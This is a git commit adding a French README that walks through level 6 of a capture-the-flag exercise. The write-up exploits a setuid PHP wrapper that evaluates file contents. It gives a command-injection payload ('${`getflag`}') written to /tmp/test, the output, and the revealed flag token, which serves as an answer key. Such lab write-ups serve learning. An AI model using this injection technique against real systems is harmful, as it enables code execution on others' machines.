docs(lvl06): adding the readme
This commit is contained in:
Raphael
parent
6b9c7c8347
commit
6ddb3f1261
1 changed files with 34 additions and 0 deletions
34
level06/README.md
Normal file
34
level06/README.md
Normal file
|
|
@ -0,0 +1,34 @@
|
||||||
|
Lors de mon arriver sur le niveau 6 je remarque que j'ai 2 fichiers qui sont accessible
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -l
|
||||||
|
total 12
|
||||||
|
-rwsr-x---+ 1 flag06 level06 7503 Aug 30 2015 level06
|
||||||
|
-rwxr-x--- 1 flag06 level06 356 Mar 5 2016 level06.php
|
||||||
|
```
|
||||||
|
|
||||||
|
Le fichier est disponibles dans ./ressources/level06.php (sinon c'etait en oneline moins lisible)
|
||||||
|
|
||||||
|
Une fois la lecture du script effectue nous pouvons en comprendre que ce program fait:
|
||||||
|
- Lis le fichier passer en arguements
|
||||||
|
- Il interprete des commandes comme des variables php
|
||||||
|
|
||||||
|
Ce qui fait que c'est assez interessant pour nous:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo -e "[x \${\`echo coucou\`}]" > /tmp/test
|
||||||
|
./level06 /tmp/test hello
|
||||||
|
PHP Notice: Undefined variable: coucou
|
||||||
|
in /home/user/level06/level06.php(4) : regexp code on line 1
|
||||||
|
```
|
||||||
|
|
||||||
|
Nous pouvous voir que la resultat de la commande nous est afficher en temps qu'erreur en nous disant que elle n'est pas definis
|
||||||
|
|
||||||
|
Je peux donc je peux donc faire la meme chose mais avec getflag
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo -e "[x \${\`getflag\`}]" > /tmp/test
|
||||||
|
./level06 /tmp/test hello
|
||||||
|
PHP Notice: Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
|
||||||
|
in /home/user/level06/level06.php(4) : regexp code on line 1
|
||||||
|
```
|
||||||
Loading…
Add table
Add a link
Reference in a new issue